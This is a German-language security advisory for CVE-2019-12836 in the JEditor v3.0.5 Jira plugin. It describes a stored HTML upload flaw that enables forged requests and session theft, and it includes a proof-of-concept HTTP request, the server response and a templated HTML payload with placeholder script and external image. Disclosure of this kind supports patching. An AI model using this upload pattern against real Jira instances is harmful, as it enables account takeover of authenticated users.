
CVE-2019-12836

JEditor v3.0.5 - WYSIWIG-Editor für JIRA
Einfacher, aber leistungsstarker Rich-Text-Editor für Jira. Importieren Sie HTML-E-Mails, fügen Sie reichhaltige Inhalte ein, erstellen Sie Vorlagen und befüllen Sie Felder vorab.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - WYSIWYG-Editor für Jira - v3.0.5
JEditor v3.0.5
Der Bobronix JEditor-Editor vor v3.0.6 für Jira ermöglicht es einem Angreifer, eine URL/einen Link (zu einem bestehenden Issue) hinzuzufügen, die/der eine Fälschung einer Anfrage an eine fremde Domain verursachen kann. Dies wiederum kann eine gefälschte Anfrage ermöglichen, die im Kontext eines authentifizierten Benutzers ausgeführt werden kann, was zum Diebstahl von Sitzungstoken und zur Übernahme des Kontos führt.
JEditor v3.0.5 erlaubt das Hochladen von Dateien mit verschiedenen Dateierweiterungen, darunter '.HTML'. JEditor wird von JIRA für seine Datei-Upload-Funktionalität genutzt. Mit dieser Funktion kann ein Angreifer bösartigen Inhalt hochladen.
Sobald der bösartige Inhalt hochgeladen ist, kann eine anschließende Anfrage für den Inhalt gestellt werden, die das inline Anzeigen und Rendern des Inhalts im Kontext des Browsers eines beliebig authentifizierten Benutzers ermöglicht. Dies kann einem Angreifer erlauben, im Namen eines beliebig authentifizierten Benutzers eine bösartige Anfrage zu fälschen.
Cross-Site-Request-Forgery (CSRF)
Fehler behoben in JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Ermöglicht eine gefälschte Anfrage, die einen Client-seitigen Angriffsvektor ermöglicht
Authentifizierter Benutzer muss mit dem eingebetteten Link/der URL interagieren
Credit: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna von Exploit Security